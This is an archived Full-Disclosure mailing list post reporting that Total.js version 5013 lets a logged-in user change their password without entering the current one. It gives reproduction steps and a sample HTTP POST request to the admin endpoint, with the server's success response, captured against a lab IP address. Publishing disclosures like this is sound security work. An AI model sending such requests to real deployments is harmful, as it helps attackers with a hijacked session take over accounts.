lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <CAF2Wu1Z10BR_gU21o+aduusvz+zMpmXNVeaEiEVkkncg4n7Mjg@mail.gmail.com>
Date: Sun, 26 Oct 2025 17:34:19 +0000
From: Andrey Stoykov <mwebsec@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Current Password not Required When Changing Password -
	totaljsv5013

# Exploit Title: Current Password not Required When Changing Password -
totaljsv5013
# Date: 10/2025
# Exploit Author: Andrey Stoykov
# Version: 5013
# Tested on: Debian 12
# Blog:
https://msecureltd.blogspot.com/2025/10/friday-fun-pentest-series-43-current.html


Current Password not Required When Changing Password:

Steps to Reproduce:
1. Login with user and click on profile icon
2. Select "Change Credentials"
3. The user would not be required to enter current password for updating
the current password


// HTTP POST Request - Changing Password

POST /admin/ HTTP/1.1
Host: 192.168.58.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0)
Gecko/20100101 Firefox/145.0
[...]

{"schema":"admin_save","data":{"name":"John
Connor","login":"gz82g8WYq3","password":"Passw0rd!"}}


// HTTP Response - Changing Password

HTTP/1.1 200 OK
set-cookie:
NPgdS=13030-39383d41540751460a15064b0f7449766a261756481745550d1f5f05414b061f5e6456343a630323750702160307415f584656405e390e3e38360e591d471c0619711511121d111f4f3a023530306156510b014f0d5045;
Expires=Wed, 26 Nov 2025 16:25:39 GMT; Path=/; SameSite=Lax
content-type: application/json; charset=utf-8
cache-control: private, no-cache, no-store, max-age=0
vary: Accept-Encoding, Last-Modified, User-Agent
expires: -1
x-powered-by: Total.js
Date: Sun, 26 Oct 2025 16:25:44 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 16

{"success":true}
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ